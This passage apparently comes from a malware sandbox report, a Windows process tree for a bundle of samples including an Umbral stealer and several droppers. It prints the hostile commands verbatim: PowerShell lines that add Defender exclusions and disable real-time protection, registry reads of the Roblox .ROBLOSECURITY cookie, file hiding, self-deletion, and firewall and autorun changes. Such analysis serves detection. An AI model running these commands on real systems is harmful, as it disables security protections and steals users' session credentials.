        PID:6436
- - C:\Users\Admin\AppData\Local\Temp\vir_bde465e6-5de1-4597-81f0-c42072322b8d\SolaraBootstraper.exe
    SolaraBootstraper.exe
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    PID:6016
  - - C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
      "C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      PID:2344
  - - C:\Users\Admin\AppData\Local\Temp\Umbral.exe
      "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
      4⤵
      Drops file in Drivers directory
      Executes dropped EXE
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:5772
    - - C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:6100
    - - C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        5⤵
        Views/modifies file attributes
        
        PID:4976
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:4764
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:3620
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:7140
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:5504
    - - C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        5⤵
        
        PID:6800
    - - C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        5⤵
        
        PID:2156
    - - C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        5⤵
        
        PID:6280
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:6444
    - - C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        5⤵
        Detects videocard installed
        
        PID:3052
    - - C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral.exe" && pause
        5⤵
        
        PID:3184
      - C:\Windows\system32\PING.EXE
        
        ping localhost
        6⤵
        Runs ping.exe
        
        PID:6416
  - - C:\Users\Admin\AppData\Local\Temp\!FIXInj.exe
      "C:\Users\Admin\AppData\Local\Temp\!FIXInj.exe"
      4⤵
      Drops startup file
      Executes dropped EXE
      Adds Run key to start application
      Suspicious behavior: GetForegroundWindowSpam
      PID:2404
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\!FIXInj.exe" "!FIXInj.exe" ENABLE
        5⤵
        Modifies Windows Firewall
        
        PID:5028
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im ctfmon.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:3456
- - C:\Users\Admin\AppData\Local\Temp\vir_bde465e6-5de1-4597-81f0-c42072322b8d\wim.dll
    wim.dll
    3⤵
    - Executes dropped EXE
    PID:2156
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\wim_76b4b279-4ae1-4a2d-834f-79da575d9efb\load.cmd" "
      4⤵
      Checks computer location settings
      PID:4944
    - - C:\Program Files\VideoLAN\VLC\vlc.exe
        
        "C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file "C:\Users\Admin\AppData\Local\Temp\wim_76b4b279-4ae1-4a2d-834f-79da575d9efb\cringe.mp4"
        5⤵
        Suspicious behavior: AddClipboardFormatListener
        Suspicious behavior: GetForegroundWindowSpam
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        Suspicious use of SetWindowsHookEx
        
        PID:3048
    - - C:\Windows\SysWOW64\NOTEPAD.EXE
        
        "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\wim_76b4b279-4ae1-4a2d-834f-79da575d9efb\lol.ini
        5⤵
        
        PID:4180
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\AppData\Local\Temp\vir_bde465e6-5de1-4597-81f0-c42072322b8d\web2.htm
    3⤵
    - Enumerates system info in registry
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    PID:208
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffa53ba46f8,0x7ffa53ba4708,0x7ffa53ba4718
      4⤵
      PID:1496
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2060,13149481612202633005,4256838546442593974,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2068 /prefetch:2
      4⤵
      PID:1816
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2060,13149481612202633005,4256838546442593974,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2228 /prefetch:3
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:2632
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2060,13149481612202633005,4256838546442593974,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2668 /prefetch:8
      4⤵
      PID:4444
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,13149481612202633005,4256838546442593974,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3232 /prefetch:1
      4⤵
      PID:6052
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,13149481612202633005,4256838546442593974,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3268 /prefetch:1
      4⤵
      PID:5540
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,13149481612202633005,4256838546442593974,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4728 /prefetch:1
      4⤵
      PID:2716
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,13149481612202633005,4256838546442593974,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4756 /prefetch:1
      4⤵
      PID:5264
- - C:\Windows\SysWOW64\rundll32.exe
    "C:\Windows\system32\rundll32.exe" cryptext.dll,CryptExtOpenCER C:\Users\Admin\AppData\Local\Temp\vir_bde465e6-5de1-4597-81f0-c42072322b8d\xcer.cer
    3⤵
    - Blocklisted process makes network request
    PID:5004
- - C:\Users\Admin\AppData\Local\Temp\vir_bde465e6-5de1-4597-81f0-c42072322b8d\f3cb220f1aaa32ca310586e5f62dcab1.exe
    f3cb220f1aaa32ca310586e5f62dcab1.exe
    3⤵
    - Executes dropped EXE
    PID:7036
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.youtube.com/account
      4⤵
      Enumerates system info in registry
      Suspicious behavior: EnumeratesProcesses
      Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
      PID:1220
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x100,0x104,0x108,0xd8,0x10c,0x7ffa53ba46f8,0x7ffa53ba4708,0x7ffa53ba4718
        5⤵
        
        PID:5316
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2156,18111150872522327215,13153057461188434671,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2176 /prefetch:2
        5⤵
        
        PID:4924
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2156,18111150872522327215,13153057461188434671,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2228 /prefetch:3
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:2784
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2156,18111150872522327215,13153057461188434671,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2776 /prefetch:8
        5⤵
        
        PID:3256
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,18111150872522327215,13153057461188434671,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3352 /prefetch:1
        5⤵
        
        PID:3532
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,18111150872522327215,13153057461188434671,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3380 /prefetch:1
        5⤵
        
        PID:1136
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,18111150872522327215,13153057461188434671,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3968 /prefetch:1
        5⤵
        
        PID:6440
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,18111150872522327215,13153057461188434671,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4268 /prefetch:1
        5⤵
        
        PID:5172
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,18111150872522327215,13153057461188434671,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5144 /prefetch:1
        5⤵
        
        PID:6768
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,18111150872522327215,13153057461188434671,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5332 /prefetch:1
        5⤵
        
        PID:6552
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.facebook.com/video
      4⤵
      PID:6332
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffa53ba46f8,0x7ffa53ba4708,0x7ffa53ba4718
        5⤵
        
        PID:4852
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2116,17722057132275100001,12704594345262380418,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2124 /prefetch:2
        5⤵
        
        PID:5692
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2116,17722057132275100001,12704594345262380418,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2176 /prefetch:3
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:5424
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/
      4⤵
      PID:6192
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffa53ba46f8,0x7ffa53ba4708,0x7ffa53ba4718
        5⤵
        
        PID:6312
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2104,654449411142061359,10607422053935665884,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2088 /prefetch:2
        5⤵
        
        PID:1900
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2104,654449411142061359,10607422053935665884,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2176 /prefetch:3
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:5724
- - C:\Windows\SysWOW64\timeout.exe
    timeout /t 15
    3⤵
    - Delays execution with timeout.exe
    PID:4696
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy C:\Windows\System32\WinMetadata C:\Users\Admin\Desktop
    3⤵
    - Enumerates system info in registry
    PID:6176
- - C:\Windows\SysWOW64\regedit.exe
    regedit
    3⤵
    - Runs regedit.exe
    PID:6188
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy C:\Windows\WinSxS C:\Users\Admin\Desktop
    3⤵
    - Enumerates system info in registry
    PID:6060
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy regmess.exe C:\Users\Admin\Desktop
    3⤵
    - Enumerates system info in registry
    PID:6164
- - C:\Users\Admin\AppData\Local\Temp\vir_bde465e6-5de1-4597-81f0-c42072322b8d\jaffa.exe
    jaffa.exe
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Drops file in System32 directory
    - Drops file in Windows directory
    - Modifies registry class
    PID:4196
  - - C:\Windows\SysWOW64\ooezvphdfx.exe
      ooezvphdfx.exe
      4⤵
      Modifies visibility of file extensions in Explorer
      Modifies visiblity of hidden/system files in Explorer
      Windows security bypass
      Disables RegEdit via registry modification
      Executes dropped EXE
      Windows security modification
      Enumerates connected drives
      Modifies WinLogon
      Drops file in System32 directory
      Modifies registry class
      PID:7124
    - - C:\Windows\SysWOW64\fvqnkqqa.exe
        
        C:\Windows\system32\fvqnkqqa.exe
        5⤵
        Executes dropped EXE
        Enumerates connected drives
        Drops file in System32 directory
        Drops file in Windows directory
        
        PID:4488
  - - C:\Windows\SysWOW64\qmrkzlocgnnaroc.exe
      qmrkzlocgnnaroc.exe
      4⤵
      Executes dropped EXE
      Adds Run key to start application
      PID:2760
  - - C:\Windows\SysWOW64\fvqnkqqa.exe
      fvqnkqqa.exe
      4⤵
      Executes dropped EXE
      Enumerates connected drives
      Drops file in System32 directory
      Drops file in Program Files directory
      Drops file in Windows directory
      PID:5012
  - - C:\Windows\SysWOW64\vrzzpxqgisjoe.exe
      vrzzpxqgisjoe.exe
      4⤵
      Executes dropped EXE
      PID:3620
  - - C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
      "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Windows\mydoc.rtf" /o ""
      4⤵
      Checks processor information in registry
      Enumerates system info in registry
      Suspicious behavior: AddClipboardFormatListener
      Suspicious use of SetWindowsHookEx
      PID:4784
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\vir_bde465e6-5de1-4597-81f0-c42072322b8d\helper.vbs"
    3⤵
    PID:3176
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\AppData\Local\Temp\vir_bde465e6-5de1-4597-81f0-c42072322b8d\web3.htm
    3⤵
    - Enumerates system info in registry
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    PID:6136
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffa53ba46f8,0x7ffa53ba4708,0x7ffa53ba4718
      4⤵
      PID:3324
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2104,8233652282319240420,5248754036411865068,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2116 /prefetch:2
      4⤵
      PID:7036
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2104,8233652282319240420,5248754036411865068,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2168 /prefetch:3
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:3728
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2104,8233652282319240420,5248754036411865068,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3032 /prefetch:8
      4⤵
      PID:5464
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,8233652282319240420,5248754036411865068,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3252 /prefetch:1
      4⤵
      PID:5812
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,8233652282319240420,5248754036411865068,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3200 /prefetch:1
      4⤵
      PID:6028
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,8233652282319240420,5248754036411865068,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4456 /prefetch:1
      4⤵
      PID:5504
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,8233652282319240420,5248754036411865068,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5168 /prefetch:1
      4⤵
      PID:5480
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,8233652282319240420,5248754036411865068,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4664 /prefetch:1
      4⤵
      PID:6524
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,8233652282319240420,5248754036411865068,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5744 /prefetch:1
      4⤵
      PID:4240
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,8233652282319240420,5248754036411865068,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5544 /prefetch:1
      4⤵
      PID:4616
